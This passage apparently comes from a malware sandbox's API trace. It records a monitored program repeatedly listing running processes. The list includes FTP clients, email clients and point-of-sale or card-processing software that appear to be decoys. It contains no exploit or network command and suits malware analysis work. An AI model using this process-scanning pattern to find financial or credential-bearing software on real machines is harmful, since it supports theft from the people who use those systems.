lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0233.513] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0233.514] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0233.515] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0233.517] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0233.518] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0233.520] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0233.522] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0233.523] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0233.525] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0233.527] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0233.529] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0233.531] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0233.533] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0233.535] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0233.537] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0233.539] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0233.541] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0233.596] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0233.601] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0233.604] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0233.606] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0233.607] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0233.608] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0233.610] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0233.611] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0233.613] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0233.615] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0233.618] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0233.620] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0233.623] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0233.626] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0233.628] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0233.630] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0233.633] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0233.667] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0233.669] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0233.670] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0233.672] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0233.674] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0233.675] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0233.677] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0233.679] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0233.680] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0233.682] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0233.690] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0233.694] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0233.696] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0233.698] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0233.700] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0233.701] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0233.703] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0233.704] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0233.706] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0233.707] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0233.709] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0233.710] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0233.712] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0233.713] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0233.734] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0233.736] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0233.737] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0233.739] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0233.740] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0233.741] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0233.743] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0233.747] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0233.749] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0233.750] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0233.751] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0233.753] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0233.754] CloseHandle (hObject=0x1b08) returned 1 [0233.754] Sleep (dwMilliseconds=0x64) [0233.875] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0233.884] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.885] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0233.889] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0233.890] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0233.892] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0233.893] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0233.894] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0233.896] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0233.897] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0233.898] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.900] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.901] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0233.906] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: 